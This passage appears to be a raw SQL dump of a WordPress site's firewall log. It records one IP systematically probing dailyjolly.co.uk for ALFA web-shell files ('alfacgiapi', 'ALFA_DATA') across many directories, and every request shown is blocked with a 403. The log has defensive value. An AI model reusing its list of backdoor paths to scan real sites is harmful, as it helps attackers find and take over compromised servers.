Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','H7mZaMuYbEjDNof4qeT0WScw',0,1674474158.0037,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','VKyPWgZoaf2M9BUsleIGJqQH',0,1674474158.4450,216,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','TyJH1PKX4siwdGnOjAm6hNvb',0,1674474158.9147,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vNB5frp07sZ3CEYlwISdizTe',0,1674474162.8333,185,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zj9alrpFTSoyv1Jb68AfWwEs',0,1674474163.2271,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pQyD3aRz2OFjHr0ALhnwPXJv',0,1674474163.6401,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','c6iIpUXeAzDL8Nhltuy5xEja',0,1674474168.3956,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','m3aR45IQEPJ6b72jqTBwLct8',0,1674474169.0042,206,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xudsbRKryY96HUkzoG2QgjTS',0,1674474169.4555,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','z6HB7JFiU52dx4M3KcnaG1RP',0,1674474173.5855,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QatyGOpj0lYESvqhPTA1KUD4',0,1674474173.9804,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','rGkCKDUj4WHnQEeINbAq1MB6',0,1674474174.4000,159,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','b7gDpQHVFP1K4CqovW2mzBnI',0,1674474178.5075,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','tP0lgCr1DW6ObEFXB9yIz5u7',0,1674474178.9143,210,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NBDl3nvjqPk7yzJdb9mILVpG',0,1674474179.3744,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6OehDQbFTP8ZWK4mnSMj0lvo',0,1674474183.0591,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8InPZLru67tWqSjewyXJDU1o',0,1674474183.4367,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','dE0l6fhgZpLIW75zNajvJQHT',0,1674474183.8049,161,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','7KXrdnWZBYM6CwPsgy8R1e2l',0,1674474187.7476,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Hm9S0j5lZL8UidAFtvNYprIw',0,1674474188.2516,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','817i9TpxjBhASoQdM30sK6tJ',0,1674474188.7139,218,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cWxFpZYE9tSlq5mVrUaAKz2w',0,1674474192.8012,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IzsHE9Amr1ZaCkf2lwMFgPXx',0,1674474193.1948,204,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BoGcNIt5sFMCX8SRlWAKpi0V',0,1674474193.6367,196,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NyzkPMhvlewn0u5AJ7c8bXjI',0,1674474197.5404,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HcjJYQGNRaquM6z0P81kVshO',0,1674474197.9343,179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','43IA8oZGbCpFvKOMuSgEXUPd',0,1674474198.3457,205,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','AnVZqSJWxDcYOKU9MaQhdgl8',0,1674474202.5558,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','OqbpNT4tsMch2gLl6rJvFGzW',0,1674474202.9329,172,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IiF6EJKYxgvbGeMrUWZdLHTk',0,1674474203.2895,156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','sfELhBFwkXIo8ndJ65DKq7yR',0,1674474209.9660,197,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1ugCB7zK3RbDhc9IJlQytdiO',0,1674474210.3840,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NhB0T2kpVdPwCoO8z5aFviSc',0,1674474210.7536,201,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ZwhmzMEuV190kC6A7oeYlfBb',0,1674474215.2440,209,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PTFYs0SfZXDrQcb36vqJ9CdR',0,1674474215.6876,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xvWyPYneNb9t3kC0lauwUJAi',0,1674474216.0524,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KTS0uVmsQMFiERjnWlhp2D6q',0,1674474220.6101,536,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6UF98IeVwiZThLE4doy7uqb5',0,1674474221.3778,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4wI0RQr2KySkpUuDMdj9PLbe',0,1674474221.8979,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','un2vB9iCVkayE0lpqc5ZLx8X',0,1674474226.2288,187,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oOwJPkqKmpirnHu2LN6cI0Dh',0,1674474226.6185,217,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vFfnd4TiS6Lhy9W51tRHOr3C',0,1674474227.0691,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','M3ZC6PdrHt1NRngE28fqGzVI',0,1674474232.0387,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','XSnG4sjePEgqWVKYDmduzt29',0,1674474232.4335,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','EmRjcDikQw1aMZGthlzdPx7v',0,1674474232.8235,222,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','raUb2wf4YSMnVOxdkXBlzyeE',0,1674474237.6634,196,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','iR9TqLCg203mGK6csnZQJ7Oz',0,1674474238.0983,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','dEOqIvZT0C7tnHzuAFh19QKy',0,1674474238.5494,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SnkYzDT3Bu4Jml7iAsL5togI',0,1674474243.2777,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','3EX2xLeMAYdZj5y69VqRa4fv',0,1674474243.7027,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','orRb5e8PUTAkcyJZm0wlShBv',0,1674474244.0623,236,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','EGxNKAMB79F40iLwCyW8IleD',0,1674474248.4266,206,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1yekSmtcYljp96Zo8KiP2rnW',0,1674474248.8727,252,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','AKoOhgqQMuTSNHs6CrXkByVZ',0,1674474249.4154,219,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','A4GuyvYw0NVCoJzka35bMrPg',0,1674474255.6821,297,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0JQtgAFM3YcUI96qLfpwduVi',0,1674474256.1598,272,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8M4iEmh1cGpyOQvlobUuXgjC',0,1674474256.8177,254,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','V9uzFM27G1X3LyHlKqandIZR',0,1674474262.2542,258,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kDGp1e8BVEuOU0jzKNbY4oc2',0,1674474262.7922,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile 